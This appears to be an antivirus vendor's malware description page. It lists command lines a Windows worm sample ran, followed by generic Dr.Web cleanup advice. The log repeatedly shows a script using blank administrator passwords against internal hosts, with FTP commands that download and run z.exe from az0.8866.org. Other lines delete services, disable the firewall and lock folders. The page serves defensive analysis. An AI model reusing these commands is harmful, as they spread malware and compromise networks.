  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.123 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.69 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.16 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c sc delete Messenger
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.4 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.5 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\cmd.exe' /c sc delete LYTC
  • '<SYSTEM32>\sc.exe' delete LYTC
  • '<SYSTEM32>\cmd.exe' /c sc stop IE_WinserverName
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.6 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.7 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\sc.exe' delete Messenger
  • '<SYSTEM32>\cmd.exe' /c sc delete IE_WinserverName
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.8 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.9 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\cmd.exe' /c sc stop HidServ
  • '<SYSTEM32>\sc.exe' stop IE_WinserverName
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.10 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c sc delete HidServ
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.11 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.12 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c cacls %ALLUSERSPROFILE%\Application Data\Storm\update\%SESSIONNAME% /e /p everyone:n
  • '<SYSTEM32>\sc.exe' delete IE_WinserverName
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.13 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.14 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\sc.exe' stop HidServ
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.3 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.15 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\sc.exe' stop Messenger
  • '<SYSTEM32>\cmd.exe' /c sc stop Messenger
  • '<SYSTEM32>\cmd.exe' /c taskkill /im coiome.exe /f
  • '<SYSTEM32>\cmd.exe' /c del <Full path to file>
  • '<SYSTEM32>\sc.exe' config Browser start= auto
  • '<SYSTEM32>\sc.exe' config lanmanserver start= auto
  • '<SYSTEM32>\sc.exe' config lanmanworkstation start= auto
  • '<SYSTEM32>\sc.exe' config LmHosts start= auto
  • '<SYSTEM32>\sc.exe' config RpcLocator start= auto
  • '<SYSTEM32>\sc.exe' config NtLmSsp start= auto
  • '<SYSTEM32>\net1.exe' start lanmanserver
  • '<SYSTEM32>\net1.exe' start lanmanworkstation
  • '<SYSTEM32>\net1.exe' start Browser
  • '<SYSTEM32>\net1.exe' stop sharedaccess
  • '<SYSTEM32>\net1.exe' start LmHosts
  • '<SYSTEM32>\net1.exe' start RpcLocator
  • '<SYSTEM32>\locator.exe'
  • '<SYSTEM32>\net1.exe' start NtLmSsp
  • '<SYSTEM32>\cmd.exe' /c sc delete JavaServe
  • '<SYSTEM32>\cmd.exe' /c taskkill /im iejore.exe /f
  • '<SYSTEM32>\sc.exe' delete JavaServe
  • '<SYSTEM32>\cmd.exe' /c taskkill /im conime.exe /f
  • '<SYSTEM32>\cmd.exe' /c sc stop LYTC
  • '<SYSTEM32>\sc.exe' stop LYTC
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.1 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.2 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.41 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.67 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.17 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.44 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.45 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.46 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.47 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.48 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.49 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.50 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.51 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.52 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.53 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.54 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.55 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.56 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.57 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.58 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.59 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.60 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.61 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.62 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.63 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.64 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.65 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.66 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.43 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.68 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.42 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.40 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cacls.exe' %ALLUSERSPROFILE%\Application Data\Storm\update\Console /e /p everyone:n
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.18 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.19 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '%WINDIR%\XXInstall\ps.exe' %WINDIR%\Tasks\DSHo.vbe 10.0.0.18 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del ...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.21 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.22 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.23 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.24 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.25 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.26 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.27 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.28 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.29 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.30 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.31 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.32 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.33 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.34 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.35 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.36 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.37 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.38 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.39 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by...
  • '<SYSTEM32>\sc.exe' delete HidServ
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\DSHo.vbe 10.0.0.176 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo b...

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android